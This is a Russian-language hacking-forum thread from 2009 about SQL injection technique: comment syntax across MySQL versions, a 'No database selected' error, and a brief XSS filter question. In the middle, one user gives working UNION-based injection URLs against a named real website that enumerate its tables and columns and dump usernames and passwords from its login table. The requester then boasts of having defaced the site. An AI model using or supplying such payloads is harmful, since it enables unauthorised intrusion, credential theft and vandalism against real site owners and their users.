17.07.2009, 11:15
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами:
9642449
Репутация:
606
|
|
если скуля в update, insert, delete то можно изменять(в рамках запроса конечно же, и уязвимых переменных)
|
|
|
17.07.2009, 11:18
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами:
9410786
Репутация:
2731
|
|
В PostgreSQL injection можно исполнять команды... Следовательно можно и изменять информацию в БД (если прав хватит)
И в MsSQL тоже, и еще в нескольких БД.
Я говорил про MySQL и про SELECT.
|
|
|
|
17.07.2009, 12:40
|
|
Постоянный
Регистрация: 11.11.2006
Сообщений: 834
С нами:
10262314
Репутация:
668
|
|
чтото не то =\\
провожу sql иньекцию ..када синтаксис не верен выводит ошибку синтаксиса .. а когда отправляю правильный запрос(с теми изменениями что мне нужны конечно) скрипт плюётся и выводит Invalid query: No database selected
в чём может быть трабл ? когда код без изменений( тоесть без иньекции) то всё норм работает =\\
пс и коментрии страно срабатывают ..
/* - работает только если его потом закрыть
-- работает странно както если сделать
union select 1,2,3,4((1='1 AND (ishidden=0))
он напишет
Код:
Invalid query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '((1='1') AND (ishidden=0))' at line 1
а если union select 1,2,3,4--((1='1 AND (ishidden=0))
напишет
Код:
Invalid query: Unknown column 'ishidden' in 'field list'
тоесть срабатывает как робел Оо
а # вще не срабатывает =\\
Последний раз редактировалось Doom123; 17.07.2009 в 13:01..
|
|
|
|
17.07.2009, 13:24
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами:
10274726
Репутация:
1917
|
|
Doom123
1. это происходит когда в коде нет выбора БД перед запросом т.е. нет например такого
Код:
mysql_select_db('mysql');
, а сам sql запрос выглядит например так:
Код:
$sql = "SELECT Host,User,Password FROM mysql.`User` where max_questions=".$id;
т.е. при выборке в FROM указывается не только таблица, но и БД. Когда после этого ты ставишь union select ... from blabla ты не указываешь БД, и поэтому запрос возвращает ошибку что бд не выбрана.
2. 5 ветка требует закрытых /* коментов (как mssql) а перед и после -- должны стоять пробелы, и # в ГЕТ запросе нужно заменять на %23
__________________
Карфаген должен быть разрушен...
|
|
|
|
17.07.2009, 17:06
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
2. 5 ветка требует закрытых /* коментов (как mssql)
Поправлю:
>= MySQL 5.0.51
До этого можно незакрытые
|
|
|
|
18.07.2009, 21:34
|
|
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
С нами:
11020706
Репутация:
4693
|
|
Сообщение от Scipio
Doom123
1. это происходит когда в коде нет выбора БД перед запросом т.е. нет например такого
Код:
mysql_select_db('mysql');
, а сам sql запрос выглядит например так:
Код:
$sql = "SELECT Host,User,Password FROM mysql.`User` where max_questions=".$id;
т.е. при выборке в FROM указывается не только таблица, но и БД. Когда после этого ты ставишь union select ... from blabla ты не указываешь БД, и поэтому запрос возвращает ошибку что бд не выбрана. Я получал такой же вывод и в пыхадмине, неплохо намудрив с JOIN.
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..
Мой блог: http://qwazar.ru/.
|
|
|
|
17.07.2009, 14:03
|
|
Новичок
Регистрация: 11.07.2009
Сообщений: 4
С нами:
8860716
Репутация:
0
|
|
где можно найти пароль? я узнал только логин отсюда:
http://www.totalgameplay.com/news.php?id=-1+union+select+1,2,3,4,5,table_name,7,8,9,10,11+fr om+information_schema.tables+limit+23,1--
а пароль найти не могу, всего таблиц 27-28... помогите найти
п.с. я новичек, поэтому нетрогайте сайт дайте мне потренироваться...гыг
|
|
|
|
17.07.2009, 14:22
|
|
Участник форума
Регистрация: 19.05.2007
Сообщений: 228
С нами:
9989667
Репутация:
240
|
|
Сообщение от blase-
где можно найти пароль? я узнал только логин отсюда:
http://www.totalgameplay.com/news.php?id=-1+union+select+1,2,3,4,5,table_name,7,8,9,10,11+fr om+information_schema.tables+limit+23,1--
а пароль найти не могу, всего таблиц 27-28... помогите найти
п.с. я новичек, поэтому нетрогайте сайт дайте мне потренироваться...гыг
Так проще, узнал допустим таблицу:
Код:
_http://www.totalgameplay.com/news.php?id=-1+union+select+1,2,3,4,5,concat_ws(0x3a,table_name,table_schema),7,8,9,10,11+from+information_schema.tables+limit+23,1--
Узнал колонки:
Код:
_http://www.totalgameplay.com/news.php?id=-1+union+select+1,2,3,4,5,concat_ws(0x3a,column_name),7,8,9,10,11+from+information_schema.columns+where+table_name=0x6C6F67696E+limit+0,1--
Достал информацию, которая тебе нужна:
Код:
_http://www.totalgameplay.com/news.php?id=-1+union+select+1,2,3,4,5,concat_ws(0x3a,username,psw),7,8,9,10,11+from+tgp_gamedb.login+limit+0,1--
А так, читай статьи, юзай SIPT.
Последний раз редактировалось The_HuliGun; 17.07.2009 в 14:51..
|
|
|
|
17.07.2009, 17:49
|
|
Новичок
Регистрация: 11.07.2009
Сообщений: 4
С нами:
8860716
Репутация:
0
|
|
The_HuliGun, большое спасибо, на другом форуме мне посоветовали использовать group, но этот более проще, спасибо!
п.с. незаходите теперь на тот сайт, там теперь ну просто кошмар!!! веб-вандализм)))
|
|
|
|
17.07.2009, 20:58
|
|
Banned
Регистрация: 23.06.2009
Сообщений: 89
С нами:
8886744
Репутация:
-67
|
|
Возможно ли провести xss если фильруется <> скобки фигурные. а остальное нет.
Последний раз редактировалось nub-hacker; 17.07.2009 в 21:04..
|
|
|
|
|
 |
|
|
Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
|
|
|
|
Похожие темы
Комбинированный вид
